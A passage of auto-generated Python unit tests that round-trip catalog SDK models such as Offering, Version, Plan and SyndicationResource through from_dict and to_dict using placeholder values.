# Construct a model instance of Offering by calling from_dict on the json representation
offering_model_dict = Offering.from_dict(offering_model_json).__dict__
offering_model2 = Offering(**offering_model_dict)
# Verify the model instances are equivalent
assert offering_model == offering_model2
# Convert model instance back to dict and verify no loss of data
offering_model_json2 = offering_model.to_dict()
assert offering_model_json2 == offering_model_json
class TestModel_OfferingInstance():
"""
Test Class for OfferingInstance
"""
def test_offering_instance_serialization(self):
"""
Test serialization/deserialization for OfferingInstance
"""
# Construct dict forms of any model objects needed in order to build this model.
offering_instance_last_operation_model = {} # OfferingInstanceLastOperation
offering_instance_last_operation_model['operation'] = 'testString'
offering_instance_last_operation_model['state'] = 'testString'
offering_instance_last_operation_model['message'] = 'testString'
offering_instance_last_operation_model['transaction_id'] = 'testString'
offering_instance_last_operation_model['updated'] = 'testString'
# Construct a json representation of a OfferingInstance model
offering_instance_model_json = {}
offering_instance_model_json['id'] = 'testString'
offering_instance_model_json['_rev'] = 'testString'
offering_instance_model_json['url'] = 'testString'
offering_instance_model_json['crn'] = 'testString'
offering_instance_model_json['label'] = 'testString'
offering_instance_model_json['catalog_id'] = 'testString'
offering_instance_model_json['offering_id'] = 'testString'
offering_instance_model_json['kind_format'] = 'testString'
offering_instance_model_json['version'] = 'testString'
offering_instance_model_json['cluster_id'] = 'testString'
offering_instance_model_json['cluster_region'] = 'testString'
offering_instance_model_json['cluster_namespaces'] = ['testString']
offering_instance_model_json['cluster_all_namespaces'] = True
offering_instance_model_json['schematics_workspace_id'] = 'testString'
offering_instance_model_json['resource_group_id'] = 'testString'
offering_instance_model_json['install_plan'] = 'testString'
offering_instance_model_json['channel'] = 'testString'
offering_instance_model_json['metadata'] = {}
offering_instance_model_json['last_operation'] = offering_instance_last_operation_model
# Construct a model instance of OfferingInstance by calling from_dict on the json representation
offering_instance_model = OfferingInstance.from_dict(offering_instance_model_json)
assert offering_instance_model != False
# Construct a model instance of OfferingInstance by calling from_dict on the json representation
offering_instance_model_dict = OfferingInstance.from_dict(offering_instance_model_json).__dict__
offering_instance_model2 = OfferingInstance(**offering_instance_model_dict)
# Verify the model instances are equivalent
assert offering_instance_model == offering_instance_model2
# Convert model instance back to dict and verify no loss of data
offering_instance_model_json2 = offering_instance_model.to_dict()
assert offering_instance_model_json2 == offering_instance_model_json
class TestModel_OfferingInstanceLastOperation():
"""
Test Class for OfferingInstanceLastOperation
"""
def test_offering_instance_last_operation_serialization(self):
"""
Test serialization/deserialization for OfferingInstanceLastOperation
"""
# Construct a json representation of a OfferingInstanceLastOperation model
offering_instance_last_operation_model_json = {}
offering_instance_last_operation_model_json['operation'] = 'testString'
offering_instance_last_operation_model_json['state'] = 'testString'
offering_instance_last_operation_model_json['message'] = 'testString'
offering_instance_last_operation_model_json['transaction_id'] = 'testString'
offering_instance_last_operation_model_json['updated'] = 'testString'
# Construct a model instance of OfferingInstanceLastOperation by calling from_dict on the json representation
offering_instance_last_operation_model = OfferingInstanceLastOperation.from_dict(offering_instance_last_operation_model_json)
assert offering_instance_last_operation_model != False
# Construct a model instance of OfferingInstanceLastOperation by calling from_dict on the json representation
offering_instance_last_operation_model_dict = OfferingInstanceLastOperation.from_dict(offering_instance_last_operation_model_json).__dict__
offering_instance_last_operation_model2 = OfferingInstanceLastOperation(**offering_instance_last_operation_model_dict)
# Verify the model instances are equivalent
assert offering_instance_last_operation_model == offering_instance_last_operation_model2
# Convert model instance back to dict and verify no loss of data
offering_instance_last_operation_model_json2 = offering_instance_last_operation_model.to_dict()
assert offering_instance_last_operation_model_json2 == offering_instance_last_operation_model_json
class TestModel_OfferingSearchResult():
"""
Test Class for OfferingSearchResult
"""
def test_offering_search_result_serialization(self):
"""
Test serialization/deserialization for OfferingSearchResult
"""
# Construct dict forms of any model objects needed in order to build this model.
rating_model = {} # Rating
rating_model['one_star_count'] = 38
rating_model['two_star_count'] = 38
rating_model['three_star_count'] = 38
rating_model['four_star_count'] = 38
feature_model = {} # Feature
feature_model['title'] = 'testString'
feature_model['description'] = 'testString'
configuration_model = {} # Configuration
configuration_model['key'] = 'testString'
configuration_model['type'] = 'testString'
configuration_model['default_value'] = { 'foo': 'bar' }
configuration_model['value_constraint'] = 'testString'
configuration_model['description'] = 'testString'
configuration_model['required'] = True
configuration_model['options'] = [{ 'foo': 'bar' }]
configuration_model['hidden'] = True
validation_model = {} # Validation
validation_model['validated'] = "2019-01-01T12:00:00Z"
validation_model['requested'] = "2019-01-01T12:00:00Z"
validation_model['state'] = 'testString'
validation_model['last_operation'] = 'testString'
validation_model['target'] = {}
resource_model = {} # Resource
resource_model['type'] = 'mem'
resource_model['value'] = { 'foo': 'bar' }
script_model = {} # Script
script_model['instructions'] = 'testString'
script_model['script'] = 'testString'
script_model['script_permission'] = 'testString'
script_model['delete_script'] = 'testString'
script_model['scope'] = 'testString'
version_entitlement_model = {} # VersionEntitlement
version_entitlement_model['provider_name'] = 'testString'
version_entitlement_model['provider_id'] = 'testString'
version_entitlement_model['product_id'] = 'testString'
version_entitlement_model['part_numbers'] = ['testString']
version_entitlement_model['image_repo_name'] = 'testString'
license_model = {} # License
license_model['id'] = 'testString'
license_model['name'] = 'testString'
license_model['type'] = 'testString'
license_model['url'] = 'testString'
license_model['description'] = 'testString'
state_model = {} # State
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
version_model = {} # Version
version_model['id'] = 'testString'
version_model['_rev'] = 'testString'
version_model['crn'] = 'testString'
version_model['version'] = 'testString'
version_model['sha'] = 'testString'
version_model['created'] = "2019-01-01T12:00:00Z"
version_model['updated'] = "2019-01-01T12:00:00Z"
version_model['offering_id'] = 'testString'
version_model['catalog_id'] = 'testString'
version_model['kind_id'] = 'testString'
version_model['tags'] = ['testString']
version_model['repo_url'] = 'testString'
version_model['source_url'] = 'testString'
version_model['tgz_url'] = 'testString'
version_model['configuration'] = [configuration_model]
version_model['metadata'] = {}
version_model['validation'] = validation_model
version_model['required_resources'] = [resource_model]
version_model['single_instance'] = True
version_model['install'] = script_model
version_model['pre_install'] = [script_model]
version_model['entitlement'] = version_entitlement_model
version_model['licenses'] = [license_model]
version_model['image_manifest_url'] = 'testString'
version_model['deprecated'] = True
version_model['package_version'] = 'testString'
version_model['state'] = state_model
version_model['version_locator'] = 'testString'
version_model['console_url'] = 'testString'
version_model['long_description'] = 'testString'
version_model['whitelisted_accounts'] = ['testString']
deployment_model = {} # Deployment
deployment_model['id'] = 'testString'
deployment_model['label'] = 'testString'
deployment_model['name'] = 'testString'
deployment_model['short_description'] = 'testString'
deployment_model['long_description'] = 'testString'
deployment_model['metadata'] = {}
deployment_model['tags'] = ['testString']
deployment_model['created'] = "2019-01-01T12:00:00Z"
deployment_model['updated'] = "2019-01-01T12:00:00Z"
plan_model = {} # Plan
plan_model['id'] = 'testString'
plan_model['label'] = 'testString'
plan_model['name'] = 'testString'
plan_model['short_description'] = 'testString'
plan_model['long_description'] = 'testString'
plan_model['metadata'] = {}
plan_model['tags'] = ['testString']
plan_model['additional_features'] = [feature_model]
plan_model['created'] = "2019-01-01T12:00:00Z"
plan_model['updated'] = "2019-01-01T12:00:00Z"
plan_model['deployments'] = [deployment_model]
kind_model = {} # Kind
kind_model['id'] = 'testString'
kind_model['format_kind'] = 'testString'
kind_model['target_kind'] = 'testString'
kind_model['metadata'] = {}
kind_model['install_description'] = 'testString'
kind_model['tags'] = ['testString']
kind_model['additional_features'] = [feature_model]
kind_model['created'] = "2019-01-01T12:00:00Z"
kind_model['updated'] = "2019-01-01T12:00:00Z"
kind_model['versions'] = [version_model]
kind_model['plans'] = [plan_model]
repo_info_model = {} # RepoInfo
repo_info_model['token'] = 'testString'
repo_info_model['type'] = 'testString'
offering_model = {} # Offering
offering_model['id'] = 'testString'
offering_model['_rev'] = 'testString'
offering_model['url'] = 'testString'
offering_model['crn'] = 'testString'
offering_model['label'] = 'testString'
offering_model['name'] = 'testString'
offering_model['offering_icon_url'] = 'testString'
offering_model['offering_docs_url'] = 'testString'
offering_model['offering_support_url'] = 'testString'
offering_model['tags'] = ['testString']
offering_model['keywords'] = ['testString']
offering_model['rating'] = rating_model
offering_model['created'] = "2019-01-01T12:00:00Z"
offering_model['updated'] = "2019-01-01T12:00:00Z"
offering_model['short_description'] = 'testString'
offering_model['long_description'] = 'testString'
offering_model['features'] = [feature_model]
offering_model['kinds'] = [kind_model]
offering_model['permit_request_ibm_public_publish'] = True
offering_model['ibm_publish_approved'] = True
offering_model['public_publish_approved'] = True
offering_model['public_original_crn'] = 'testString'
offering_model['publish_public_crn'] = 'testString'
offering_model['portal_approval_record'] = 'testString'
offering_model['portal_ui_url'] = 'testString'
offering_model['catalog_id'] = 'testString'
offering_model['catalog_name'] = 'testString'
offering_model['metadata'] = {}
offering_model['disclaimer'] = 'testString'
offering_model['hidden'] = True
offering_model['provider'] = 'testString'
offering_model['repo_info'] = repo_info_model
# Construct a json representation of a OfferingSearchResult model
offering_search_result_model_json = {}
offering_search_result_model_json['offset'] = 38
offering_search_result_model_json['limit'] = 38
offering_search_result_model_json['total_count'] = 38
offering_search_result_model_json['resource_count'] = 38
offering_search_result_model_json['first'] = 'testString'
offering_search_result_model_json['last'] = 'testString'
offering_search_result_model_json['prev'] = 'testString'
offering_search_result_model_json['next'] = 'testString'
offering_search_result_model_json['resources'] = [offering_model]
# Construct a model instance of OfferingSearchResult by calling from_dict on the json representation
offering_search_result_model = OfferingSearchResult.from_dict(offering_search_result_model_json)
assert offering_search_result_model != False
# Construct a model instance of OfferingSearchResult by calling from_dict on the json representation
offering_search_result_model_dict = OfferingSearchResult.from_dict(offering_search_result_model_json).__dict__
offering_search_result_model2 = OfferingSearchResult(**offering_search_result_model_dict)
# Verify the model instances are equivalent
assert offering_search_result_model == offering_search_result_model2
# Convert model instance back to dict and verify no loss of data
offering_search_result_model_json2 = offering_search_result_model.to_dict()
assert offering_search_result_model_json2 == offering_search_result_model_json
class TestModel_OperatorDeployResult():
"""
Test Class for OperatorDeployResult
"""
def test_operator_deploy_result_serialization(self):
"""
Test serialization/deserialization for OperatorDeployResult
"""
# Construct a json representation of a OperatorDeployResult model
operator_deploy_result_model_json = {}
operator_deploy_result_model_json['phase'] = 'testString'
operator_deploy_result_model_json['message'] = 'testString'
operator_deploy_result_model_json['link'] = 'testString'
operator_deploy_result_model_json['name'] = 'testString'
operator_deploy_result_model_json['version'] = 'testString'
operator_deploy_result_model_json['namespace'] = 'testString'
operator_deploy_result_model_json['package_name'] = 'testString'
operator_deploy_result_model_json['catalog_id'] = 'testString'
# Construct a model instance of OperatorDeployResult by calling from_dict on the json representation
operator_deploy_result_model = OperatorDeployResult.from_dict(operator_deploy_result_model_json)
assert operator_deploy_result_model != False
# Construct a model instance of OperatorDeployResult by calling from_dict on the json representation
operator_deploy_result_model_dict = OperatorDeployResult.from_dict(operator_deploy_result_model_json).__dict__
operator_deploy_result_model2 = OperatorDeployResult(**operator_deploy_result_model_dict)
# Verify the model instances are equivalent
assert operator_deploy_result_model == operator_deploy_result_model2
# Convert model instance back to dict and verify no loss of data
operator_deploy_result_model_json2 = operator_deploy_result_model.to_dict()
assert operator_deploy_result_model_json2 == operator_deploy_result_model_json
class TestModel_Plan():
"""
Test Class for Plan
"""
def test_plan_serialization(self):
"""
Test serialization/deserialization for Plan
"""
# Construct dict forms of any model objects needed in order to build this model.
feature_model = {} # Feature
feature_model['title'] = 'testString'
feature_model['description'] = 'testString'
deployment_model = {} # Deployment
deployment_model['id'] = 'testString'
deployment_model['label'] = 'testString'
deployment_model['name'] = 'testString'
deployment_model['short_description'] = 'testString'
deployment_model['long_description'] = 'testString'
deployment_model['metadata'] = {}
deployment_model['tags'] = ['testString']
deployment_model['created'] = "2019-01-01T12:00:00Z"
deployment_model['updated'] = "2019-01-01T12:00:00Z"
# Construct a json representation of a Plan model
plan_model_json = {}
plan_model_json['id'] = 'testString'
plan_model_json['label'] = 'testString'
plan_model_json['name'] = 'testString'
plan_model_json['short_description'] = 'testString'
plan_model_json['long_description'] = 'testString'
plan_model_json['metadata'] = {}
plan_model_json['tags'] = ['testString']
plan_model_json['additional_features'] = [feature_model]
plan_model_json['created'] = "2019-01-01T12:00:00Z"
plan_model_json['updated'] = "2019-01-01T12:00:00Z"
plan_model_json['deployments'] = [deployment_model]
# Construct a model instance of Plan by calling from_dict on the json representation
plan_model = Plan.from_dict(plan_model_json)
assert plan_model != False
# Construct a model instance of Plan by calling from_dict on the json representation
plan_model_dict = Plan.from_dict(plan_model_json).__dict__
plan_model2 = Plan(**plan_model_dict)
# Verify the model instances are equivalent
assert plan_model == plan_model2
# Convert model instance back to dict and verify no loss of data
plan_model_json2 = plan_model.to_dict()
assert plan_model_json2 == plan_model_json
class TestModel_PublishObject():
"""
Test Class for PublishObject
"""
def test_publish_object_serialization(self):
"""
Test serialization/deserialization for PublishObject
"""
# Construct a json representation of a PublishObject model
publish_object_model_json = {}
publish_object_model_json['permit_ibm_public_publish'] = True
publish_object_model_json['ibm_approved'] = True
publish_object_model_json['public_approved'] = True
publish_object_model_json['portal_approval_record'] = 'testString'
publish_object_model_json['portal_url'] = 'testString'
# Construct a model instance of PublishObject by calling from_dict on the json representation
publish_object_model = PublishObject.from_dict(publish_object_model_json)
assert publish_object_model != False
# Construct a model instance of PublishObject by calling from_dict on the json representation
publish_object_model_dict = PublishObject.from_dict(publish_object_model_json).__dict__
publish_object_model2 = PublishObject(**publish_object_model_dict)
# Verify the model instances are equivalent
assert publish_object_model == publish_object_model2
# Convert model instance back to dict and verify no loss of data
publish_object_model_json2 = publish_object_model.to_dict()
assert publish_object_model_json2 == publish_object_model_json
class TestModel_Rating():
"""
Test Class for Rating
"""
def test_rating_serialization(self):
"""
Test serialization/deserialization for Rating
"""
# Construct a json representation of a Rating model
rating_model_json = {}
rating_model_json['one_star_count'] = 38
rating_model_json['two_star_count'] = 38
rating_model_json['three_star_count'] = 38
rating_model_json['four_star_count'] = 38
# Construct a model instance of Rating by calling from_dict on the json representation
rating_model = Rating.from_dict(rating_model_json)
assert rating_model != False
# Construct a model instance of Rating by calling from_dict on the json representation
rating_model_dict = Rating.from_dict(rating_model_json).__dict__
rating_model2 = Rating(**rating_model_dict)
# Verify the model instances are equivalent
assert rating_model == rating_model2
# Convert model instance back to dict and verify no loss of data
rating_model_json2 = rating_model.to_dict()
assert rating_model_json2 == rating_model_json
class TestModel_RepoInfo():
"""
Test Class for RepoInfo
"""
def test_repo_info_serialization(self):
"""
Test serialization/deserialization for RepoInfo
"""
# Construct a json representation of a RepoInfo model
repo_info_model_json = {}
repo_info_model_json['token'] = 'testString'
repo_info_model_json['type'] = 'testString'
# Construct a model instance of RepoInfo by calling from_dict on the json representation
repo_info_model = RepoInfo.from_dict(repo_info_model_json)
assert repo_info_model != False
# Construct a model instance of RepoInfo by calling from_dict on the json representation
repo_info_model_dict = RepoInfo.from_dict(repo_info_model_json).__dict__
repo_info_model2 = RepoInfo(**repo_info_model_dict)
# Verify the model instances are equivalent
assert repo_info_model == repo_info_model2
# Convert model instance back to dict and verify no loss of data
repo_info_model_json2 = repo_info_model.to_dict()
assert repo_info_model_json2 == repo_info_model_json
class TestModel_Resource():
"""
Test Class for Resource
"""
def test_resource_serialization(self):
"""
Test serialization/deserialization for Resource
"""
# Construct a json representation of a Resource model
resource_model_json = {}
resource_model_json['type'] = 'mem'
resource_model_json['value'] = { 'foo': 'bar' }
# Construct a model instance of Resource by calling from_dict on the json representation
resource_model = Resource.from_dict(resource_model_json)
assert resource_model != False
# Construct a model instance of Resource by calling from_dict on the json representation
resource_model_dict = Resource.from_dict(resource_model_json).__dict__
resource_model2 = Resource(**resource_model_dict)
# Verify the model instances are equivalent
assert resource_model == resource_model2
# Convert model instance back to dict and verify no loss of data
resource_model_json2 = resource_model.to_dict()
assert resource_model_json2 == resource_model_json
class TestModel_Script():
"""
Test Class for Script
"""
def test_script_serialization(self):
"""
Test serialization/deserialization for Script
"""
# Construct a json representation of a Script model
script_model_json = {}
script_model_json['instructions'] = 'testString'
script_model_json['script'] = 'testString'
script_model_json['script_permission'] = 'testString'
script_model_json['delete_script'] = 'testString'
script_model_json['scope'] = 'testString'
# Construct a model instance of Script by calling from_dict on the json representation
script_model = Script.from_dict(script_model_json)
assert script_model != False
# Construct a model instance of Script by calling from_dict on the json representation
script_model_dict = Script.from_dict(script_model_json).__dict__
script_model2 = Script(**script_model_dict)
# Verify the model instances are equivalent
assert script_model == script_model2
# Convert model instance back to dict and verify no loss of data
script_model_json2 = script_model.to_dict()
assert script_model_json2 == script_model_json
class TestModel_State():
"""
Test Class for State
"""
def test_state_serialization(self):
"""
Test serialization/deserialization for State
"""
# Construct a json representation of a State model
state_model_json = {}
state_model_json['current'] = 'testString'
state_model_json['current_entered'] = "2019-01-01T12:00:00Z"
state_model_json['pending'] = 'testString'
state_model_json['pending_requested'] = "2019-01-01T12:00:00Z"
state_model_json['previous'] = 'testString'
# Construct a model instance of State by calling from_dict on the json representation
state_model = State.from_dict(state_model_json)
assert state_model != False
# Construct a model instance of State by calling from_dict on the json representation
state_model_dict = State.from_dict(state_model_json).__dict__
state_model2 = State(**state_model_dict)
# Verify the model instances are equivalent
assert state_model == state_model2
# Convert model instance back to dict and verify no loss of data
state_model_json2 = state_model.to_dict()
assert state_model_json2 == state_model_json
class TestModel_SyndicationAuthorization():
"""
Test Class for SyndicationAuthorization
"""
def test_syndication_authorization_serialization(self):
"""
Test serialization/deserialization for SyndicationAuthorization
"""
# Construct a json representation of a SyndicationAuthorization model
syndication_authorization_model_json = {}
syndication_authorization_model_json['token'] = 'testString'
syndication_authorization_model_json['last_run'] = "2019-01-01T12:00:00Z"
# Construct a model instance of SyndicationAuthorization by calling from_dict on the json representation
syndication_authorization_model = SyndicationAuthorization.from_dict(syndication_authorization_model_json)
assert syndication_authorization_model != False
# Construct a model instance of SyndicationAuthorization by calling from_dict on the json representation
syndication_authorization_model_dict = SyndicationAuthorization.from_dict(syndication_authorization_model_json).__dict__
syndication_authorization_model2 = SyndicationAuthorization(**syndication_authorization_model_dict)
# Verify the model instances are equivalent
assert syndication_authorization_model == syndication_authorization_model2
# Convert model instance back to dict and verify no loss of data
syndication_authorization_model_json2 = syndication_authorization_model.to_dict()
assert syndication_authorization_model_json2 == syndication_authorization_model_json
class TestModel_SyndicationCluster():
"""
Test Class for SyndicationCluster
"""
def test_syndication_cluster_serialization(self):
"""
Test serialization/deserialization for SyndicationCluster
"""
# Construct a json representation of a SyndicationCluster model
syndication_cluster_model_json = {}
syndication_cluster_model_json['region'] = 'testString'
syndication_cluster_model_json['id'] = 'testString'
syndication_cluster_model_json['name'] = 'testString'
syndication_cluster_model_json['resource_group_name'] = 'testString'
syndication_cluster_model_json['type'] = 'testString'
syndication_cluster_model_json['namespaces'] = ['testString']
syndication_cluster_model_json['all_namespaces'] = True
# Construct a model instance of SyndicationCluster by calling from_dict on the json representation
syndication_cluster_model = SyndicationCluster.from_dict(syndication_cluster_model_json)
assert syndication_cluster_model != False
# Construct a model instance of SyndicationCluster by calling from_dict on the json representation
syndication_cluster_model_dict = SyndicationCluster.from_dict(syndication_cluster_model_json).__dict__
syndication_cluster_model2 = SyndicationCluster(**syndication_cluster_model_dict)
# Verify the model instances are equivalent
assert syndication_cluster_model == syndication_cluster_model2
# Convert model instance back to dict and verify no loss of data
syndication_cluster_model_json2 = syndication_cluster_model.to_dict()
assert syndication_cluster_model_json2 == syndication_cluster_model_json
class TestModel_SyndicationHistory():
"""
Test Class for SyndicationHistory
"""
def test_syndication_history_serialization(self):
"""
Test serialization/deserialization for SyndicationHistory
"""
# Construct dict forms of any model objects needed in order to build this model.
syndication_cluster_model = {} # SyndicationCluster
syndication_cluster_model['region'] = 'testString'
syndication_cluster_model['id'] = 'testString'
syndication_cluster_model['name'] = 'testString'
syndication_cluster_model['resource_group_name'] = 'testString'
syndication_cluster_model['type'] = 'testString'
syndication_cluster_model['namespaces'] = ['testString']
syndication_cluster_model['all_namespaces'] = True
# Construct a json representation of a SyndicationHistory model
syndication_history_model_json = {}
syndication_history_model_json['namespaces'] = ['testString']
syndication_history_model_json['clusters'] = [syndication_cluster_model]
syndication_history_model_json['last_run'] = "2019-01-01T12:00:00Z"
# Construct a model instance of SyndicationHistory by calling from_dict on the json representation
syndication_history_model = SyndicationHistory.from_dict(syndication_history_model_json)
assert syndication_history_model != False
# Construct a model instance of SyndicationHistory by calling from_dict on the json representation
syndication_history_model_dict = SyndicationHistory.from_dict(syndication_history_model_json).__dict__
syndication_history_model2 = SyndicationHistory(**syndication_history_model_dict)
# Verify the model instances are equivalent
assert syndication_history_model == syndication_history_model2
# Convert model instance back to dict and verify no loss of data
syndication_history_model_json2 = syndication_history_model.to_dict()
assert syndication_history_model_json2 == syndication_history_model_json
class TestModel_SyndicationResource():
"""
Test Class for SyndicationResource
"""
def test_syndication_resource_serialization(self):
"""
Test serialization/deserialization for SyndicationResource
"""
# Construct dict forms of any model objects needed in order to build this model.
syndication_cluster_model = {} # SyndicationCluster
syndication_cluster_model['region'] = 'testString'
syndication_cluster_model['id'] = 'testString'
syndication_cluster_model['name'] = 'testString'
syndication_cluster_model['resource_group_name'] = 'testString'
syndication_cluster_model['type'] = 'testString'
syndication_cluster_model['namespaces'] = ['testString']
syndication_cluster_model['all_namespaces'] = True
syndication_history_model = {} # SyndicationHistory
syndication_history_model['namespaces'] = ['testString']
syndication_history_model['clusters'] = [syndication_cluster_model]
syndication_history_model['last_run'] = "2019-01-01T12:00:00Z"
syndication_authorization_model = {} # SyndicationAuthorization
syndication_authorization_model['token'] = 'testString'
syndication_authorization_model['last_run'] = "2019-01-01T12:00:00Z"
# Construct a json representation of a SyndicationResource model
syndication_resource_model_json = {}
syndication_resource_model_json['remove_related_components'] = True
syndication_resource_model_json['clusters'] = [syndication_cluster_model]
syndication_resource_model_json['history'] = syndication_history_model
syndication_resource_model_json['authorization'] = syndication_authorization_model
# Construct a model instance of SyndicationResource by calling from_dict on the json representation
syndication_resource_model = SyndicationResource.from_dict(syndication_resource_model_json)
assert syndication_resource_model != False
# Construct a model instance of SyndicationResource by calling from_dict on the json representation
syndication_resource_model_dict = SyndicationResource.from_dict(syndication_resource_model_json).__dict__
syndication_resource_model2 = SyndicationResource(**syndication_resource_model_dict)
# Verify the model instances are equivalent
assert syndication_resource_model == syndication_resource_model2
# Convert model instance back to dict and verify no loss of data
syndication_resource_model_json2 = syndication_resource_model.to_dict()
assert syndication_resource_model_json2 == syndication_resource_model_json
class TestModel_Validation():
"""
Test Class for Validation
"""
def test_validation_serialization(self):
"""
Test serialization/deserialization for Validation
"""
# Construct a json representation of a Validation model
validation_model_json = {}
validation_model_json['validated'] = "2019-01-01T12:00:00Z"
validation_model_json['requested'] = "2019-01-01T12:00:00Z"
validation_model_json['state'] = 'testString'
validation_model_json['last_operation'] = 'testString'
validation_model_json['target'] = {}
# Construct a model instance of Validation by calling from_dict on the json representation
validation_model = Validation.from_dict(validation_model_json)
assert validation_model != False
# Construct a model instance of Validation by calling from_dict on the json representation
validation_model_dict = Validation.from_dict(validation_model_json).__dict__
validation_model2 = Validation(**validation_model_dict)
# Verify the model instances are equivalent
assert validation_model == validation_model2
# Convert model instance back to dict and verify no loss of data
validation_model_json2 = validation_model.to_dict()
assert validation_model_json2 == validation_model_json
class TestModel_Version():
"""
Test Class for Version
"""
def test_version_serialization(self):
"""
Test serialization/deserialization for Version
"""
# Construct dict forms of any model objects needed in order to build this model.
configuration_model = {} # Configuration
configuration_model['key'] = 'testString'
configuration_model['type'] = 'testString'
configuration_model['default_value'] = { 'foo': 'bar' }
configuration_model['value_constraint'] = 'testString'
configuration_model['description'] = 'testString'
configuration_model['required'] = True
configuration_model['options'] = [{ 'foo': 'bar' }]
configuration_model['hidden'] = True
validation_model = {} # Validation
validation_model['validated'] = "2019-01-01T12:00:00Z"
validation_model['requested'] = "2019-01-01T12:00:00Z"
validation_model['state'] = 'testString'
validation_model['last_operation'] = 'testString'
validation_model['target'] = {}
resource_model = {} # Resource
resource_model['type'] = 'mem'
resource_model['value'] = { 'foo': 'bar' }
script_model = {} # Script
script_model['instructions'] = 'testString'
script_model['script'] = 'testString'
script_model['script_permission'] = 'testString'
script_model['delete_script'] = 'testString'
script_model['scope'] = 'testString'
version_entitlement_model = {} # VersionEntitlement
version_entitlement_model['provider_name'] = 'testString'
version_entitlement_model['provider_id'] = 'testString'
version_entitlement_model['product_id'] = 'testString'
version_entitlement_model['part_numbers'] = ['testString']
version_entitlement_model['image_repo_name'] = 'testString'
license_model = {} # License
license_model['id'] = 'testString'
license_model['name'] = 'testString'
license_model['type'] = 'testString'
license_model['url'] = 'testString'
license_model['description'] = 'testString'
state_model = {} # State
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
# Construct a json representation of a Version model
version_model_json = {}
version_model_json['id'] = 'testString'
version_model_json['_rev'] = 'testString'
version_model_json['crn'] = 'testString'
version_model_json['version'] = 'testString'
version_model_json['sha'] = 'testString'
version_model_json['created'] = "2019-01-01T12:00:00Z"
version_model_json['updated'] = "2019-01-01T12:00:00Z"
version_model_json['offering_id'] = 'testString'
version_model_json['catalog_id'] = 'testString'
version_model_json['kind_id'] = 'testString'
version_model_json['tags'] = ['testString']
version_model_json['repo_url'] = 'testString'
version_model_json['source_url'] = 'testString'
version_model_json['tgz_url'] = 'testString'
version_model_json['configuration'] = [configuration_model]
version_model_json['metadata'] = {}
version_model_json['validation'] = validation_model
version_model_json['required_resources'] = [resource_model]
version_model_json['single_instance'] = True
version_model_json['install'] = script_model
version_model_json['pre_install'] = [script_model]
version_model_json['entitlement'] = version_entitlement_model
version_model_json['licenses'] = [license_model]
version_model_json['image_manifest_url'] = 'testString'
version_model_json['deprecated'] = True
version_model_json['package_version'] = 'testString'
version_model_json['state'] = state_model
version_model_json['version_locator'] = 'testString'
version_model_json['console_url'] = 'testString'
version_model_json['long_description'] = 'testString'
version_model_json['whitelisted_accounts'] = ['testString']
# Construct a model instance of Version by calling from_dict on the json representation
version_model = Version.from_dict(version_model_json)
assert version_model != False
# Construct a model instance of Version by calling from_dict on the json representation
version_model_dict = Version.from_dict(version_model_json).__dict__
version_model2 = Version(**version_model_dict)
# Verify the model instances are equivalent
assert version_model == version_model2
# Convert model instance back to dict and verify no loss of data
version_model_json2 = version_model.to_dict()
assert version_model_json2 == version_model_json
class TestModel_VersionEntitlement():
"""
Test Class for VersionEntitlement
"""
def test_version_entitlement_serialization(self):
"""
Test serialization/deserialization for VersionEntitlement
"""
# Construct a json representation of a VersionEntitlement model
version_entitlement_model_json = {}
version_entitlement_model_json['provider_name'] = 'testString'
version_entitlement_model_json['provider_id'] = 'testString'
version_entitlement_model_json['product_id'] = 'testString'
version_entitlement_model_json['part_numbers'] = ['testString']
version_entitlement_model_json['image_repo_name'] = 'testString'
# Construct a model instance of VersionEntitlement by calling from_dict on the json representation
version_entitlement_model = VersionEntitlement.from_dict(version_entitlement_model_json)
assert version_entitlement_model != False
# Construct a model instance of VersionEntitlement by calling from_dict on the json representation
version_entitlement_model_dict = VersionEntitlement.from_dict(version_entitlement_model_json).__dict__
version_entitlement_model2 = VersionEntitlement(**version_entitlement_model_dict)
# Verify the model instances are equivalent
assert version_entitlement_model == version_entitlement_model2
# Convert model instance back to dict and verify no loss of data
version_entitlement_model_json2 = version_entitlement_model.to_dict()
assert version_entitlement_model_json2 == version_entitlement_model_json
class TestModel_VersionUpdateDescriptor():
"""
Test Class for VersionUpdateDescriptor
"""
def test_version_update_descriptor_serialization(self):
"""
Test serialization/deserialization for VersionUpdateDescriptor
"""
# Construct dict forms of any model objects needed in order to build this model.
state_model = {} # State
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
resource_model = {} # Resource
resource_model['type'] = 'mem'
resource_model['value'] = { 'foo': 'bar' }
# Construct a json representation of a VersionUpdateDescriptor model
version_update_descriptor_model_json = {}
version_update_descriptor_model_json['version_locator'] = 'testString'
version_update_descriptor_model_json['version'] = 'testString'
version_update_descriptor_model_json['state'] = state_model
version_update_descriptor_model_json['required_resources'] = [resource_model]
version_update_descriptor_model_json['package_version'] = 'testString'
version_update_descriptor_model_json['can_update'] = True
version_update_descriptor_model_json['messages'] = {}
# Construct a model instance of VersionUpdateDescriptor by calling from_dict on the json representation
version_update_descriptor_model = VersionUpdateDescriptor.from_dict(version_update_descriptor_model_json)
assert version_update_descriptor_model != False
# Construct a model instance of VersionUpdateDescriptor by calling from_dict on the json representation
version_update_descriptor_model_dict = VersionUpdateDescriptor.from_dict(version_update_descriptor_model_json).__dict__
version_update_descriptor_model2 = VersionUpdateDescriptor(**version_update_descriptor_model_dict)
# Verify the model instances are equivalent
assert version_update_descriptor_model == version_update_descriptor_model2
# Convert model instance back to dict and verify no loss of data
version_update_descriptor_model_json2 = version_update_descriptor_model.to_dict()
assert version_update_descriptor_model_json2 == version_update_descriptor_model_json
# endregion
##############################################################################
# End of Model Tests
##############################################################################
| 52.531685
| 4,243
| 0.642423
| 55,085
| 505,670
| 5.599909
| 0.009767
| 0.012059
| 0.022109
| 0.026129
| 0.944682
| 0.912776
| 0.873962
| 0.842572
| 0.829063
| 0.817707
| 0
| 0.030148
| 0.216647
| 505,670
| 9,625
| 4,244
| 52.537143
| 0.748588
| 0.112281
| 0
| 0.747376
| 0
| 0.015916
| 0.433421
| 0.083916
| 0
| 0
